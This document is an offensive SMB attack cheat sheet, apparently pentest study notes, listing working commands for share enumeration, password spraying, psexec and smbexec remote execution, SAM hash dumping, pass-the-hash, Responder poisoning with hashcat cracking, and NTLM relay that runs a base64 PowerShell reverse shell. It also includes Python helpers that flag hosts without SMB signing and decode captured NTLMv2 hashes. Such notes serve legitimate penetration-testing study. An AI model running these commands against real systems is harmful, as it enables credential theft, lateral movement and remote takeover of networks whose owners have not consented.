# SMB (139, 445)

## Attacking SMB

### Overview

* **Port 139** — SMB over NetBIOS (TCP/IP)
* **Port 445** — SMB direct over TCP (Windows 2000+)
* **Samba** — Linux/Unix SMB implementation
* **MSRPC** — uses SMB named pipes as transport layer

***

### Enumeration

```bash
sudo nmap -sV -sC -p139,445 <IP>
```

The scan output gives the SMB version, hostname, OS, and message-signing status (signing disabled means an NTLM relay attack is possible).
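A triage helper that turns the signing status from the scan into a per-host list, as an added example that is not part of the original page: it parses the text nmap prints for the `smb-security-mode` and `smb2-security-mode` scripts and reports which hosts do not enforce signing. The scan excerpt and hosts are constructed.

```python
# Added example (not from the original page): triage nmap smb-security-mode /
# smb2-security-mode output for hosts that accept unsigned SMB sessions.
# The scan excerpt is constructed; hosts are made up.
import re

SAMPLE_SCAN = """\
Nmap scan report for 10.10.110.5
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for dc01.corp.local (10.10.110.10)
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 10.10.110.20
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

REPORT_RE = re.compile(r"^Nmap scan report for (.+)$", re.MULTILINE)
# First alternative: smb2-security-mode wording; second: smb-security-mode wording.
REQUIRED_RE = re.compile(r"signing enabled and required|message_signing: required")
NOT_REQUIRED_RE = re.compile(
    r"signing enabled but not required|message_signing: (disabled|supported)")


def signing_status(scan_text: str) -> dict[str, str]:
    """Map each host in the scan to 'required', 'not required' or 'unknown'."""
    status = {}
    reports = list(REPORT_RE.finditer(scan_text))
    for i, m in enumerate(reports):
        end = reports[i + 1].start() if i + 1 < len(reports) else len(scan_text)
        block = scan_text[m.end():end]  # this host's script output only
        if REQUIRED_RE.search(block):
            status[m.group(1)] = "required"
        elif NOT_REQUIRED_RE.search(block):
            status[m.group(1)] = "not required"
        else:
            status[m.group(1)] = "unknown"
    return status


def relay_exposed(scan_text: str) -> list[str]:
    """Hosts that do not enforce signing: these would accept a relayed NTLM session."""
    return sorted(h for h, s in signing_status(scan_text).items() if s == "not required")
```

Hosts returned by `relay_exposed` are the ones where `RequireSecuritySignature` should be enforced before anything else on this page matters.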

***

### Null Session (No Creds)

```bash
# List shares
smbclient -N -L //<IP>

# Shares + permissions
smbmap -H <IP>

# Recursive browse
smbmap -H <IP> -r <sharename>

# Download / Upload
smbmap -H <IP> --download "notes\note.txt"
smbmap -H <IP> --upload test.txt "notes\test.txt"

# RPC null session
rpcclient -U'%' <IP>
rpcclient $> enumdomusers

# Full auto enum
./enum4linux-ng.py <IP> -A -C
```

**enum4linux-ng gets:** workgroup, users, OS info, groups, shares, password policy

***

### Password Spraying

```bash
crackmapexec smb <IP> -u userlist.txt -p 'Password' --local-auth
```

* `--continue-on-success` — don't stop at first hit
* `--local-auth` — non-domain machine
* Wait 30–60 min between spray rounds to avoid lockout

***

### RCE (with creds)

```bash
# impacket-psexec → deploys service to ADMIN$, needs writable share
impacket-psexec administrator:'Password123!'@<IP>

# impacket-smbexec → spins local SMB server, no writable share needed
impacket-smbexec administrator:'Password123!'@<IP>

# CME → CMD or PS across multiple hosts
crackmapexec smb <IP> -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
# -x = CMD | -X = PowerShell
# default exec method is atexec; specify smbexec if it fails
```

***

### Post-Exploitation (Windows)

```bash
# Enumerate logged-on users across subnet
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

# Dump SAM hashes
crackmapexec smb <IP> -u administrator -p 'Password123!' --sam
```

**SAM hashes → crack or use for PtH**

***

### Pass-the-Hash (PtH)

```bash
crackmapexec smb <IP> -u Administrator -H <NTHASH>
impacket-psexec administrator@<IP> -hashes :<NTHASH>
```

No plaintext needed — NTLM hash is enough to authenticate.

***

### Forced Auth — Responder

```bash
sudo responder -I <interface>
```

**How it works:**

1. Victim can't resolve hostname → sends LLMNR/NBT-NS multicast
2. Responder poisons the response → victim connects to our fake SMB server
3. NTLMv2 hash captured

**Crack it:**

```bash
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
```

> NTLMv2 hashes are salted per session → same password gives different hashes each time
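To see where that per-session variation comes from, here is an added decoder (not part of the original page) for the `hashcat -m 5600` capture line: the server challenge, the client challenge and the timestamp inside the blob all change every session, so the same password never produces the same capture twice. The sample line, the user/domain names and the placeholder NTProofStr are constructed.

```python
# Added example (not from the original page): decode a captured NTLMv2 response in
# the hashcat -m 5600 line format (USER::DOMAIN:server_challenge:NTProofStr:blob).
# The blob layout is the MS-NLMP NTLMv2_CLIENT_CHALLENGE structure; the sample line
# is constructed and its NTProofStr is a placeholder, not a real HMAC.
import struct
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
AV_NAMES = {1: "nb_computer", 2: "nb_domain", 3: "dns_computer", 4: "dns_domain"}

@dataclass
class NtlmV2Capture:
    user: str
    domain: str
    server_challenge: bytes   # per session, chosen by the server
    nt_proof: bytes           # HMAC-MD5 over server challenge + blob
    timestamp: datetime       # per session, taken from the blob
    client_challenge: bytes   # per session, chosen by the client
    target_info: dict

def parse_5600(line: str) -> NtlmV2Capture:
    user, _, domain, sc_hex, proof_hex, blob_hex = line.strip().split(":", 5)
    blob = bytes.fromhex(blob_hex)
    sig, _reserved, filetime, client_chal, _unk = struct.unpack_from("<IIQ8sI", blob)
    if sig != 0x00000101:  # RespType=1, HiRespType=1
        raise ValueError("not an NTLMv2 blob")
    target_info, off = {}, 28
    while True:  # AV_PAIR list: uint16 id, uint16 len, value; id 0 terminates
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        if av_id == 0:
            break
        value = blob[off + 4:off + 4 + av_len]
        if av_id in AV_NAMES:
            value = value.decode("utf-16-le")
        target_info[AV_NAMES.get(av_id, av_id)] = value
        off += 4 + av_len
    ts = FILETIME_EPOCH + timedelta(microseconds=filetime // 10)
    return NtlmV2Capture(user, domain, bytes.fromhex(sc_hex), bytes.fromhex(proof_hex),
                         ts, client_chal, target_info)

def build_sample_line() -> str:
    """Constructed capture: jdoe authenticating to CORP at 2024-01-15 12:00 UTC."""
    delta = datetime(2024, 1, 15, 12, 0, tzinfo=timezone.utc) - FILETIME_EPOCH
    filetime = (delta.days * 86400 + delta.seconds) * 10**7  # 100 ns ticks since 1601
    av = b"".join(struct.pack("<HH", i, len(v)) + v for i, v in
                  ((2, "CORP".encode("utf-16-le")), (1, "DC01".encode("utf-16-le"))))
    blob = struct.pack("<IIQ8sI", 0x101, 0, filetime, b"\xaa" * 8, 0) + av + b"\x00" * 8
    return f"jdoe::CORP:1122334455667788:{'00' * 16}:{blob.hex()}"
```

The decoded timestamp and target-info pairs are what an incident responder uses to date a capture and to see which host the victim believed it was authenticating to.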

***

### NTLM Relay (if cracking fails)

**Requirement:** SMB signing disabled on target

```bash
# Step 1 — disable SMB in Responder so it doesn't respond (we're relaying, not capturing)
# /etc/responder/Responder.conf → SMB = Off

# Step 2 — relay to target, auto-dumps SAM
impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET_IP>

# Step 3 — relay + execute reverse shell
impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET_IP> -c 'powershell -e <b64>'
```

Generate PS reverse shell at [revshells.com](https://www.revshells.com) → PowerShell #3 (Base64)

***

### Attack Flow Summary

```
Null session?
  YES → smbmap/enum4linux → browse shares, get files, RPC enum
  NO  → spray creds with CME

Got creds?
  → psexec/smbexec for RCE
  → --sam for hashes
  → --loggedon-users for lateral movement targets

Got hash, can't crack?
  → Check signing disabled → relay with ntlmrelayx

On network, no creds?
  → Responder → capture NTLMv2 → crack or relay
```
